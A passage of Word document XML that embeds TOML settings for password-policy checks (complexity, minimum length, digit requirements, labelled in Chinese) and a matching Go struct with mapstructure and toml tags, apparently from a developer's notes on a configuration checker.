          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C61DA" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>check_rule_en="password_complex"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2C256" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>description="</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>密码复杂度检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446246C" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>advice="</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>密码复杂度检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F03280" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[settings.password.length]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE4E97" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>check_rule="</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>最小长度</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9B485" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>check_rule_en="password_least_length"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F3EF7" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>description="</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>最小长度</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFC574" w14:textId="1C9F4BBF" w:rsidR="004014B4" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>advice="</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>要求数字</w:t>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A26EB24" w14:textId="055535C7" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FCD2D5" w14:textId="0A33003A" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>写的结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4FA6F2" w14:textId="77777777" w:rsidR="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7217AE06" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type Output struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C163E" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Settings struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606DF7F4" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Password struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE24A7" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRule   string `mapstructure:"check_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006112C8" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRuleEn string `mapstructure:"check_rule_en"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271A3CBA" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string `mapstructure:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34987CA5" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Advice      string `mapstructure:"advice"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F29C55" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Length      struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E645346" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRule   string `mapstructure:"check_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DBA1F0" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string `mapstructure:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E03142" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Advice      string `mapstructure:"advice"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE65E0" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"length"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3127255B" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Num struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0EBE0" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRule   string `mapstructure:"check_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF5C5B7" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string `mapstructure:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEF969" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Advice      string `mapstructure:"advice"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A31BC4" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"num"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D1A40" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Upper struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4094E064" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRule   string `mapstructure:"check_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A713FAF" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string `mapstructure:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4F0DE" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Advice      string `mapstructure:"advice"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B95BC0" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"upper"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6901AC30" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Lower struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0037ACAC" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>CheckRule   string `mapstructure:"check_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E7DFEE" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Description string `toml:"description"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44869610" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Advice      string `toml:"advice"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A37BB8D" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>} `toml:"lower"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472304F6" w14:textId="77777777" w:rsidR="00165691" w:rsidRPr="00165691" w:rsidRDefault="00165691" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00165691">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
